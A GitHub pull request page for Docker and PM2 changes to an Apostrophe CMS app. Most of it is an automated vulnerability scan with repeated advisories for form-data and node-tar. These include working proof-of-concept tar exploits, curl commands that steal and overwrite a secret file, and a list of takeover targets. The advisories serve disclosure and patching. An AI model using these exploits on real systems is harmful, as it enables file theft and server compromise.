Skip to content

Conversation

@a-nomad
Copy link

@a-nomad a-nomad commented Jan 29, 2026

  • Converted Dockerfile to a multi-stage build to reduce image size
  • Add PM2 package for process management
  • Updated production startup configuration to utilize all CPU cores instead of single one

Optimized Docker image size using a multi-stage build that separates build-time and runtime dependencies, eliminating unnecessary layers from the final image. Enhanced production startup by replacing direct Node.js execution with PM2 cluster mode (pm2-runtime -i max), enabling automatic horizontal scaling across all available CPU cores for better resource utilization and improved application performance.

@coderabbitai
Copy link
Contributor

coderabbitai bot commented Jan 29, 2026

Walkthrough

This PR restructures the Docker build into a multi-stage pipeline with distinct build and runtime stages. The build stage introduces build-time arguments (NODE_ENV, NPM_INSTALL_FLAGS) and runs npm ci with the specified flags, while the runtime stage creates a non-root user, installs wget, and copies the built application from the build stage. Additionally, the start script in package.json is updated to use pm2-runtime with horizontal scaling instead of direct Node invocation, and pm2-runtime is added as a runtime dependency.

Possibly related PRs

🚥 Pre-merge checks | ✅ 3
✅ Passed checks (3 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed The title accurately describes the main changes: multi-stage Docker build optimization and PM2 cluster mode enablement. However, it exceeds the recommended 75-character limit by 2 characters.
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.


Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

@a-nomad a-nomad requested a review from IhorMasechko January 29, 2026 17:20
@github-actions
Copy link

🔍 Vulnerabilities of apostrophe-cms:test

📦 Image Reference apostrophe-cms:test
digestsha256:375137bd5fcb8d8ebf3f5e001f1f5ae1f87c4b650dc92a50e4f949be43437f24
vulnerabilitiescritical: 1 high: 23 medium: 0 low: 0
platformlinux/amd64
size175 MB
packages986
📦 Base Image node:23-alpine
also known as
  • 23-alpine3.22
  • 23.11-alpine
  • 23.11-alpine3.22
  • 23.11.1-alpine
  • 23.11.1-alpine3.22
digestsha256:b9d38d589853406ff0d4364f21969840c3e0397087643aef8eede40edbb6c7cd
vulnerabilitiescritical: 0 high: 7 medium: 11 low: 4 unspecified: 3
critical: 1 high: 0 medium: 0 low: 0 form-data 4.0.2 (npm)

pkg:npm/form-data@4.0.2

critical 9.4: CVE--2025--7783 Use of Insufficiently Random Values

Affected range>=4.0.0
<4.0.4
Fixed version4.0.4
CVSS Score9.4
CVSS VectorCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
EPSS Score0.172%
EPSS Percentile39th percentile
Description

Summary

form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:

  1. can observe other values produced by Math.random in the target application, and
  2. can control one field of a request made using form-data

Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.

This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.

Details

The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347

An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)

PoC

PoC here: https://github.com/benweissmann/CVE-2025-7783-poc

Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).

Impact

For an application to be vulnerable, it must:

  • Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)
  • Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

critical: 0 high: 3 medium: 0 low: 0 tar 7.4.3 (npm)

pkg:npm/tar@7.4.3

high 8.8: CVE--2026--23950 Improper Handling of Unicode Encoding

Affected range<=7.5.3
Fixed version7.5.4
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
EPSS Score0.015%
EPSS Percentile3rd percentile
Description

TITLE: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS

AUTHOR: Tomás Illuminati

Details

A race condition vulnerability exists in node-tar (v7.5.3) this is to an incomplete handling of Unicode path collisions in the path-reservations system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., ß and ss), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a PathReservations system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.

// node-tar/src/path-reservations.ts (Lines 53-62)
reserve(paths: string[], fn: Handler) {
    paths =
      isWindows ?
        ['win32 parallelization disabled']
      : paths.map(p => {
          return stripTrailingSlashes(
            join(normalizeUnicode(p)), // <- THE PROBLEM FOR MacOS FS
          ).toLowerCase()
        })

In MacOS the join(normalizeUnicode(p)), FS confuses ß with ss, but this code does not. For example:

bash-3.2$ printf "CONTENT_SS\n" > collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf "CONTENT_ESSZETT\n" > collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x   3 testuser  staff    96 Jan 19 01:25 .
drwxr-x---+ 82 testuser  staff  2624 Jan 19 01:25 ..
-rw-r--r--   1 testuser  staff    16 Jan 19 01:26 collision_test_ss
bash-3.2$ 

PoC

const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('\[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

Impact

This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive.


Remediation

Update path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en').

Users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.


high 8.2: CVE--2026--24842 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<7.5.7
Fixed version7.5.7
CVSS Score8.2
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score0.027%
EPSS Percentile7th percentile
Description

Summary

node-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.

Details

The vulnerability exists in lib/unpack.js. When extracting a hardlink, two functions handle the linkpath differently:

Security check in [STRIPABSOLUTEPATH]:

const entryDir = path.posix.dirname(entry.path);
const resolved = path.posix.normalize(path.posix.join(entryDir, linkpath));
if (resolved.startsWith('../')) { /* block */ }

Hardlink creation in [HARDLINK]:

const linkpath = path.resolve(this.cwd, entry.linkpath);
fs.linkSync(linkpath, dest);

Example: An application extracts a TAR using tar.extract({ cwd: '/var/app/uploads/' }). The TAR contains entry a/b/c/d/x as a hardlink to ../../../../etc/passwd.

  • Security check resolves the linkpath relative to the entry's parent directory: a/b/c/d/ + ../../../../etc/passwd = etc/passwd. No ../ prefix, so it passes.

  • Hardlink creation resolves the linkpath relative to the extraction directory (this.cwd): /var/app/uploads/ + ../../../../etc/passwd = /etc/passwd. This escapes to the system's /etc/passwd.

The security check and hardlink creation use different starting points (entry directory a/b/c/d/ vs extraction directory /var/app/uploads/), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.

PoC

Setup

Create a new directory with these files:

poc/
├── package.json
├── secret.txt          ← sensitive file (target)
├── server.js           ← vulnerable server
├── create-malicious-tar.js
├── verify.js
└── uploads/            ← created automatically by server.js
    └── (extracted files go here)

package.json

{ "dependencies": { "tar": "^7.5.0" } }

secret.txt (sensitive file outside uploads/)

DATABASE_PASSWORD=supersecret123

server.js (vulnerable file upload server)

const http = require('http');
const fs = require('fs');
const path = require('path');
const tar = require('tar');

const PORT = 3000;
const UPLOAD_DIR = path.join(__dirname, 'uploads');
fs.mkdirSync(UPLOAD_DIR, { recursive: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/upload') {
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', async () => {
      fs.writeFileSync(path.join(UPLOAD_DIR, 'upload.tar'), Buffer.concat(chunks));
      await tar.extract({ file: path.join(UPLOAD_DIR, 'upload.tar'), cwd: UPLOAD_DIR });
      res.end('Extracted\n');
    });
  } else if (req.method === 'GET' && req.url === '/read') {
    // Simulates app serving extracted files (e.g., file download, static assets)
    const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
    if (fs.existsSync(targetPath)) {
      res.end(fs.readFileSync(targetPath));
    } else {
      res.end('File not found\n');
    }
  } else if (req.method === 'POST' && req.url === '/write') {
    // Simulates app writing to extracted file (e.g., config update, log append)
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', () => {
      const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
      if (fs.existsSync(targetPath)) {
        fs.writeFileSync(targetPath, Buffer.concat(chunks));
        res.end('Written\n');
      } else {
        res.end('File not found\n');
      }
    });
  } else {
    res.end('POST /upload, GET /read, or POST /write\n');
  }
}).listen(PORT, () => console.log(`http://localhost:${PORT}`));

create-malicious-tar.js (attacker creates exploit TAR)

const fs = require('fs');

function tarHeader(name, type, linkpath = '', size = 0) {
  const b = Buffer.alloc(512, 0);
  b.write(name, 0); b.write('0000644', 100); b.write('0000000', 108);
  b.write('0000000', 116); b.write(size.toString(8).padStart(11, '0'), 124);
  b.write(Math.floor(Date.now()/1000).toString(8).padStart(11, '0'), 136);
  b.write('        ', 148);
  b[156] = type === 'dir' ? 53 : type === 'link' ? 49 : 48;
  if (linkpath) b.write(linkpath, 157);
  b.write('ustar\x00', 257); b.write('00', 263);
  let sum = 0; for (let i = 0; i < 512; i++) sum += b[i];
  b.write(sum.toString(8).padStart(6, '0') + '\x00 ', 148);
  return b;
}

// Hardlink escapes to parent directory's secret.txt
fs.writeFileSync('malicious.tar', Buffer.concat([
  tarHeader('d/', 'dir'),
  tarHeader('d/x', 'link', '../secret.txt'),
  Buffer.alloc(1024)
]));
console.log('Created malicious.tar');

Run

# Setup
npm install
echo "DATABASE_PASSWORD=supersecret123" > secret.txt

# Terminal 1: Start server
node server.js

# Terminal 2: Execute attack
node create-malicious-tar.js
curl -X POST --data-binary @malicious.tar http://localhost:3000/upload

# READ ATTACK: Steal secret.txt content via the hardlink
curl http://localhost:3000/read
# Returns: DATABASE_PASSWORD=supersecret123

# WRITE ATTACK: Overwrite secret.txt through the hardlink
curl -X POST -d "PWNED" http://localhost:3000/write

# Confirm secret.txt was modified
cat secret.txt

Impact

An attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:

Immediate (Read Attack): If the application serves extracted files, attacker can read any file readable by the process.

Conditional (Write Attack): If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.

Remote Code Execution / Server Takeover

Attack Vector Target File Result
SSH Access ~/.ssh/authorized_keys Direct shell access to server
Cron Backdoor /etc/cron.d/*, ~/.crontab Persistent code execution
Shell RC Files ~/.bashrc, ~/.profile Code execution on user login
Web App Backdoor Application .js, .php, .py files Immediate RCE via web requests
Systemd Services /etc/systemd/system/*.service Code execution on service restart
User Creation /etc/passwd (if running as root) Add new privileged user

Data Exfiltration & Corruption

  1. Overwrite arbitrary files via hardlink escape + subsequent write operations
  2. Read sensitive files by creating hardlinks that point outside extraction directory
  3. Corrupt databases and application state
  4. Steal credentials from config files, .env, secrets

high 8.2: CVE--2026--23745 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<=7.5.2
Fixed version7.5.3
CVSS Score8.2
CVSS VectorCVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N
EPSS Score0.007%
EPSS Percentile0th percentile
Description

Summary

The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets.

Details

The vulnerability exists in src/unpack.ts within the [HARDLINK] and [SYMLINK] methods.

1. Hardlink Escape (Arbitrary File Overwrite)

The extraction logic uses path.resolve(this.cwd, entry.linkpath) to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (entry.linkpath) is an absolute path, path.resolve ignores the first argument (this.cwd) entirely and returns the absolute path.

The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., /etc/passwd) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.

2. Symlink Poisoning

The extraction logic passes the user-supplied entry.linkpath directly to fs.symlink without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (../../), even when secure extraction defaults are used.

PoC

The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to /etc/passwd). It then extracts the archive using standard node-tar settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.

const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

Impact

  • Arbitrary File Overwrite: An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
  • Remote Code Execution (RCE): In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all Link and SymbolicLink tar entries from extracted packages.)
critical: 0 high: 3 medium: 0 low: 0 tar 6.2.1 (npm)

pkg:npm/tar@6.2.1

high 8.8: CVE--2026--23950 Improper Handling of Unicode Encoding

Affected range<=7.5.3
Fixed version7.5.4
CVSS Score8.8
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L
EPSS Score0.015%
EPSS Percentile3rd percentile
Description

TITLE: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS

AUTHOR: Tomás Illuminati

Details

A race condition vulnerability exists in node-tar (v7.5.3) this is to an incomplete handling of Unicode path collisions in the path-reservations system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., ß and ss), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a PathReservations system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.

// node-tar/src/path-reservations.ts (Lines 53-62)
reserve(paths: string[], fn: Handler) {
    paths =
      isWindows ?
        ['win32 parallelization disabled']
      : paths.map(p => {
          return stripTrailingSlashes(
            join(normalizeUnicode(p)), // <- THE PROBLEM FOR MacOS FS
          ).toLowerCase()
        })

In MacOS the join(normalizeUnicode(p)), FS confuses ß with ss, but this code does not. For example:

bash-3.2$ printf "CONTENT_SS\n" > collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf "CONTENT_ESSZETT\n" > collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x   3 testuser  staff    96 Jan 19 01:25 .
drwxr-x---+ 82 testuser  staff  2624 Jan 19 01:25 ..
-rw-r--r--   1 testuser  staff    16 Jan 19 01:26 collision_test_ss
bash-3.2$ 

PoC

const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('\[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

Impact

This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using NFD Unicode normalization (in which ß and ss are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which ß causes an inode collision with ss)). This enables an attacker to circumvent internal parallelization locks (PathReservations) using conflicting filenames within a malicious tar archive.


Remediation

Update path-reservations.js to use a normalization form that matches the target filesystem's behavior (e.g., NFKD), followed by first toLocaleLowerCase('en') and then toLocaleUpperCase('en').

Users who cannot upgrade promptly, and who are programmatically using node-tar to extract arbitrary tarball data should filter out all SymbolicLink entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.


high 8.2: CVE--2026--24842 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<7.5.7
Fixed version7.5.7
CVSS Score8.2
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
EPSS Score0.027%
EPSS Percentile7th percentile
Description

Summary

node-tar contains a vulnerability where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory.

Details

The vulnerability exists in lib/unpack.js. When extracting a hardlink, two functions handle the linkpath differently:

Security check in [STRIPABSOLUTEPATH]:

const entryDir = path.posix.dirname(entry.path);
const resolved = path.posix.normalize(path.posix.join(entryDir, linkpath));
if (resolved.startsWith('../')) { /* block */ }

Hardlink creation in [HARDLINK]:

const linkpath = path.resolve(this.cwd, entry.linkpath);
fs.linkSync(linkpath, dest);

Example: An application extracts a TAR using tar.extract({ cwd: '/var/app/uploads/' }). The TAR contains entry a/b/c/d/x as a hardlink to ../../../../etc/passwd.

  • Security check resolves the linkpath relative to the entry's parent directory: a/b/c/d/ + ../../../../etc/passwd = etc/passwd. No ../ prefix, so it passes.

  • Hardlink creation resolves the linkpath relative to the extraction directory (this.cwd): /var/app/uploads/ + ../../../../etc/passwd = /etc/passwd. This escapes to the system's /etc/passwd.

The security check and hardlink creation use different starting points (entry directory a/b/c/d/ vs extraction directory /var/app/uploads/), so the same linkpath can pass validation but still escape. The deeper the entry path, the more levels an attacker can escape.

PoC

Setup

Create a new directory with these files:

poc/
├── package.json
├── secret.txt          ← sensitive file (target)
├── server.js           ← vulnerable server
├── create-malicious-tar.js
├── verify.js
└── uploads/            ← created automatically by server.js
    └── (extracted files go here)

package.json

{ "dependencies": { "tar": "^7.5.0" } }

secret.txt (sensitive file outside uploads/)

DATABASE_PASSWORD=supersecret123

server.js (vulnerable file upload server)

const http = require('http');
const fs = require('fs');
const path = require('path');
const tar = require('tar');

const PORT = 3000;
const UPLOAD_DIR = path.join(__dirname, 'uploads');
fs.mkdirSync(UPLOAD_DIR, { recursive: true });

http.createServer((req, res) => {
  if (req.method === 'POST' && req.url === '/upload') {
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', async () => {
      fs.writeFileSync(path.join(UPLOAD_DIR, 'upload.tar'), Buffer.concat(chunks));
      await tar.extract({ file: path.join(UPLOAD_DIR, 'upload.tar'), cwd: UPLOAD_DIR });
      res.end('Extracted\n');
    });
  } else if (req.method === 'GET' && req.url === '/read') {
    // Simulates app serving extracted files (e.g., file download, static assets)
    const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
    if (fs.existsSync(targetPath)) {
      res.end(fs.readFileSync(targetPath));
    } else {
      res.end('File not found\n');
    }
  } else if (req.method === 'POST' && req.url === '/write') {
    // Simulates app writing to extracted file (e.g., config update, log append)
    const chunks = [];
    req.on('data', c => chunks.push(c));
    req.on('end', () => {
      const targetPath = path.join(UPLOAD_DIR, 'd', 'x');
      if (fs.existsSync(targetPath)) {
        fs.writeFileSync(targetPath, Buffer.concat(chunks));
        res.end('Written\n');
      } else {
        res.end('File not found\n');
      }
    });
  } else {
    res.end('POST /upload, GET /read, or POST /write\n');
  }
}).listen(PORT, () => console.log(`http://localhost:${PORT}`));

create-malicious-tar.js (attacker creates exploit TAR)

const fs = require('fs');

function tarHeader(name, type, linkpath = '', size = 0) {
  const b = Buffer.alloc(512, 0);
  b.write(name, 0); b.write('0000644', 100); b.write('0000000', 108);
  b.write('0000000', 116); b.write(size.toString(8).padStart(11, '0'), 124);
  b.write(Math.floor(Date.now()/1000).toString(8).padStart(11, '0'), 136);
  b.write('        ', 148);
  b[156] = type === 'dir' ? 53 : type === 'link' ? 49 : 48;
  if (linkpath) b.write(linkpath, 157);
  b.write('ustar\x00', 257); b.write('00', 263);
  let sum = 0; for (let i = 0; i < 512; i++) sum += b[i];
  b.write(sum.toString(8).padStart(6, '0') + '\x00 ', 148);
  return b;
}

// Hardlink escapes to parent directory's secret.txt
fs.writeFileSync('malicious.tar', Buffer.concat([
  tarHeader('d/', 'dir'),
  tarHeader('d/x', 'link', '../secret.txt'),
  Buffer.alloc(1024)
]));
console.log('Created malicious.tar');

Run

# Setup
npm install
echo "DATABASE_PASSWORD=supersecret123" > secret.txt

# Terminal 1: Start server
node server.js

# Terminal 2: Execute attack
node create-malicious-tar.js
curl -X POST --data-binary @malicious.tar http://localhost:3000/upload

# READ ATTACK: Steal secret.txt content via the hardlink
curl http://localhost:3000/read
# Returns: DATABASE_PASSWORD=supersecret123

# WRITE ATTACK: Overwrite secret.txt through the hardlink
curl -X POST -d "PWNED" http://localhost:3000/write

# Confirm secret.txt was modified
cat secret.txt

Impact

An attacker can craft a malicious TAR archive that, when extracted by an application using node-tar, creates hardlinks that escape the extraction directory. This enables:

Immediate (Read Attack): If the application serves extracted files, attacker can read any file readable by the process.

Conditional (Write Attack): If the application later writes to the hardlink path, it modifies the target file outside the extraction directory.

Remote Code Execution / Server Takeover

Attack Vector Target File Result
SSH Access ~/.ssh/authorized_keys Direct shell access to server
Cron Backdoor /etc/cron.d/*, ~/.crontab Persistent code execution
Shell RC Files ~/.bashrc, ~/.profile Code execution on user login
Web App Backdoor Application .js, .php, .py files Immediate RCE via web requests
Systemd Services /etc/systemd/system/*.service Code execution on service restart
User Creation /etc/passwd (if running as root) Add new privileged user

Data Exfiltration & Corruption

  1. Overwrite arbitrary files via hardlink escape + subsequent write operations
  2. Read sensitive files by creating hardlinks that point outside extraction directory
  3. Corrupt databases and application state
  4. Steal credentials from config files, .env, secrets

high 8.2: CVE--2026--23745 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<=7.5.2
Fixed version7.5.3
CVSS Score8.2
CVSS VectorCVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N
EPSS Score0.007%
EPSS Percentile0th percentile
Description

Summary

The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets.

Details

The vulnerability exists in src/unpack.ts within the [HARDLINK] and [SYMLINK] methods.

1. Hardlink Escape (Arbitrary File Overwrite)

The extraction logic uses path.resolve(this.cwd, entry.linkpath) to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (entry.linkpath) is an absolute path, path.resolve ignores the first argument (this.cwd) entirely and returns the absolute path.

The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., /etc/passwd) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.

2. Symlink Poisoning

The extraction logic passes the user-supplied entry.linkpath directly to fs.symlink without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (../../), even when secure extraction defaults are used.

PoC

The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to /etc/passwd). It then extracts the archive using standard node-tar settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.

const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
